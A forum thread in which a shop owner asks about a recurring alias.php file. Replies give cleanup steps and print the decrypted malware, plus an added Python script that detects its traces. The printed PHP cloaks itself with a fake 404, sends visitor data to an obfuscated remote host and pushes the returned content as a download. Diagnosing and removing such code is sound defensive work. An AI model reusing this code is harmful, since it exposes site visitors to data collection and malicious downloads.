  • Topic: alias.php

    jey

    • Fresh on board
    • Posts: 92
    • Gender:
    alias.php
    on: 05 August 2016, 06:07:54
    Every day an alias.php file is added to our server, even if I removed those files.

    We suspect these are spam files. Please let me know which file this is.

    Password to open ZIP is:

    gm>yGI/*X!QH/4

    Linkback: https://www.modified-shop.org/forum/index.php?topic=35500.0

    fishnet

    • Supporting member
    • Posts: 4,821
    • Gender:
    Re: alias.php
    Reply #1 on: 05 August 2016, 12:03:33
    without having looked at your files, if you've been hacked or if a virus was uploaded from your or your customers' computer, you'll have to
    backup the shop for later research (for example on a linux system)
    clean every single shop file and the database (if you don't have a backup without malware)
    clean all computers that had access (by the way don't forget SD cards and usb sticks)
    change database password
    change ftp password
    if paypal used: change pay api password
    check if data for credit cards or banktransfer is still correct
    change admin passwords in shop
    best practice: change router and wifi password

    should be it (did I forget something?)

    h-h-h

    • modified Team
    • Posts: 4,562
    Re: alias.php
    Reply #2 on: 05 August 2016, 12:33:00
    now it's readable:
    Code: PHP
    <?php
    #hs
    exit;
    #hs - decrypted:
    error_reporting(0);
    ini_set('display_errors', 0);

    $cuc_ip_parts = Array(
        '103.251.107/98',
        '125.63.68.',
        '132.66.110-',
        '142.540-03-',
        '1874-64-030-',
        '192.168.10/.;87',
        '192.200.22.',
        '195.1430-3-',
        '195.238.96.',
        '196.40.310-',
        '198.102.70/-',
        '198.1434-5-',
        '199.2434-44-',
        '202.1.1610-',
        '202.95.21/1-',
        '205.164.20/-',
        '206.2435-0/6:87',
        '2076-108-0/3=87',
        '208.118.255.9',
        '208.80.192.',
        '208.83.136.',
        '209.1032-11398',
        '209.66.70.',
        '211.2438-3/.8',
        '216.139.0.',
        '216.187.93.',
        '216.194.108598',
        '216.47.64.',
        '24.172.72.',
        '24.2243-016-',
        '24.225.8.',
        '63.2540-064-',
        '64.140.2112-',
        '64.235.150/-',
        '64.235.153.',
        '64.38.116.',
        '64.658-55-',
        '65.39.140.',
        '66.172.47.',
        '66.249.65.',
        '66.25432,76,',
        '66.37.68.',
        '69.10.134.',
        '70.42.1310-',
        '72.2.95.',
        '74.116.210/68',
        '74.217.90.',
        '74.94.238.',
        '75.185.193.',
        '787-000-6-',
        '80.248.210/58',
        '82.80.230.',
        '85.112.1.',
        '98/-034-10/.>7',
        '981-37-005-',
        '981-37-010.,',
        '983-025-025-',
        '983-110-10/.?7',
        '10.9.71.',
        '109.2032-0/0<87',
        '200.75.0.',
        '201.238.246.9',
        '204.27.195.',
        '206.126.99.',
        '208.122.95.',
        '216.234.101398',
        '41.223.210/68',
        '64.235.154.',
        '687-07/-10068',
        '87.243.128.',
        '212.71.1.',
        '64.34.1110-',
        '149.255.60/-',
        '1873-0621,0/;87',
        '1873-0621,00@87',
        '1873-0621,00A87',
        '192.171.233.9',
        '213.254.241.9',
        '387-0//-10/.7',
        '4.768-012-',
        '190.112.108498',
        '980-105-0/6-',
        '70.39.157.',
        '211.110.107098',
        '208.80.194.',
        '121.42.0.',
        '64.74.215.'
    );

    $header_array = Array(
        "Mozilla/5.0 (X11; Linux x875^5329|ptD=6,.,/'|Ecauy-0./.././.)Orobclu,0/468758yGRN*.357'",
        "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.90:}Sqhcdms.9>,.'",
        "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.90:}Sqhcdms.9>,.'"
    );

    $rip = getRemoteIP();

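    // Cloaking: listed user agents, requests without a public IP, and listed
    // IP prefixes all end in someShit(), which answers with a fake 404 page.
    if (in_array($_SERVER['HTTP_USER_AGENT'], $header_array)) {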
        someShit();
    }
    if (empty($rip)) {
        someShit();
    }
    if (in_array(substr($rip, intval(0), strrpos($rip, '.') + intval(1)), $cuc_ip_parts)) {
        someShit();
    }


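    // Note: "$rnum ^= $rnum" below always yields 0, so $rnum ends up as 32 and
    // the final string is eight spaces, whatever the request URI was.
    $rnum = 29171; $i = 0;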
    foreach (str_split($_SERVER['REQUEST_URI']) as $value) {
        $rnum += ord($value);
        $i++;
    }
    $rnum <<= 2;
    $rnum ^= $rnum;
    $rnum += 32;

    $rnum = str_repeat(chr($rnum), 8);


    $rip  = '89.52.78.12';

    $query = Array();
    $query['i'] = getRemoteIP();
    $query['p'] = @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI'];
    $query['u'] = @$_SERVER['HTTP_USER_AGENT'];
    $query['a'] = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
    $query['r'] = @$_SERVER['HTTP_REFERER'];

    $ext_content = stream_context_create(Array(
        'http' => Array(
            'method' => 'POST',
            'header' => 'Content-type: application/x-www-form-urlencoded',
            'content' => http_build_query($query)
        )
    ));


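    // The remote host is computed with long2ip() instead of being written out;
    // the visitor data collected in $query is POSTed to it.
    $ext_url = 'http://' . long2ip(-41 ^ (ord($rnum[0]) + ord($rnum[1]) + 1496600076)) . ':80' . '/nbgvecy5/45by4rfh.php';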

    $ext_content = @file_get_contents($ext_url, FALSE, $ext_content);
    if (strlen($ext_content) < 10) {
        someShit();
    }


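    // First line of the response is a file name, the rest is the body; anything
    // not named *.html is sent to the visitor as a download.
    $ext_content = explode("\n", $ext_content);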

    $ext_filename = array_shift($ext_content);
    $ext_content    = implode("\n", $ext_content);

    if (strstr($ext_filename, '.html') === FALSE) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename=' . $ext_filename);
        header('Content-Length: ' . strlen($ext_content));
    }
    exit($ext_content);


    function getRemoteIP() {
        if (array_key_exists(REMOTE_ADDR, $_SERVER) === TRUE) {
            foreach (explode(',', $_SERVER['REMOTE_ADDR']) as $remote_ip) {
                $remote_ip = trim($remote_ip);
                if (filter_var($remote_ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== FALSE) {
                    return $remote_ip;
                }
            }
        }    
        return '';
    }

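    // Serves a 404: on first use it copies the site's real error page by requesting
    // a random md5 path on this host and caches it as "404.<script name>".
    function someShit() {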
       
        header('HTTP/1.1 404 Not Found');
       
        $called_filename = basename($_SERVER['PHP_SELF']);

        if (!file_exists('404.' . $called_filename)) {
            $random_md5 = md5(uniqid());
            $ext_content = @file_get_contents('http://' . $_SERVER['HTTP_HOST'] . '/' . $random_md5, FALSE, stream_context_create(array(
                'http' => array(
                    'ignore_errors' => true
                )
            )));
            $ext_content   = str_replace($random_md5, $called_filename, $ext_content);
           
            file_put_contents('404.' . $called_filename, $ext_content);
        } else {
            $ext_content = @file_get_contents('404.' . $called_filename);
        }
       
        exit($ext_content);
    }
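
Added example, not part of the original posts: a Python check for two traces the decrypted code above leaves behind, the `404.<script name>` cache file written by `someShit()` and the access-log entry for the random 32-hex-digit path it requests from the shop's own host. It assumes the cache file lands in the script's own directory and a combined-format access log; the log lines and directory tree are constructed.

```python
import os
import re
import tempfile

# someShit() fetches http://<own host>/<md5(uniqid())> to copy the site's real
# 404 page, so the access log shows a GET for a bare 32-hex-digit path.
PROBE = re.compile(r'"GET /([0-9a-f]{32}) HTTP/1\.[01]" 404 ')


def find_404_probes(log_lines):
    """Return the random paths requested when the 404 page was cloned."""
    return [m.group(1) for line in log_lines if (m := PROBE.search(line))]


def find_cached_404_pages(root):
    """Return (script, cache) pairs where '404.<script>' sits beside <script>."""
    pairs = []
    for dirpath, _dirs, files in os.walk(root):
        present = set(files)
        for name in sorted(files):
            if name.startswith("404.") and name[4:] in present:
                pairs.append((os.path.join(dirpath, name[4:]),
                              os.path.join(dirpath, name)))
    return pairs


def demo():
    # Constructed sample data: three access-log lines and a temporary webroot.
    log = [
        '203.0.113.7 - - [05/Aug/2016:06:01:12 +0200] "GET /alias.php HTTP/1.1" 404 1310 "-" "Mozilla/5.0"',
        '198.51.100.20 - - [05/Aug/2016:06:01:12 +0200] "GET /9e107d9d372bb6826bd81d3542a419d6 HTTP/1.0" 404 1342 "-" "-"',
        '203.0.113.9 - - [05/Aug/2016:06:02:40 +0200] "GET /index.php HTTP/1.1" 200 8421 "-" "Mozilla/5.0"',
    ]
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "includes"))
        for rel in ("index.php", "includes/alias.php", "includes/404.alias.php"):
            with open(os.path.join(root, rel), "w") as fh:
                fh.write("<?php // placeholder\n")
        pairs = [tuple(os.path.relpath(p, root).replace(os.sep, "/") for p in pair)
                 for pair in find_cached_404_pages(root)]
    return find_404_probes(log), pairs


if __name__ == "__main__":
    print(demo())
```

A script that has a `404.` twin beside it is a candidate for manual review, and the time of the matching log entry shows when the cloaking branch first ran.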

    jey

    • Fresh on board
    • Posts: 92
    • Gender:
    Re: alias.php
    Reply #3 on: 08 August 2016, 10:50:58
    Can you please explain what file this is?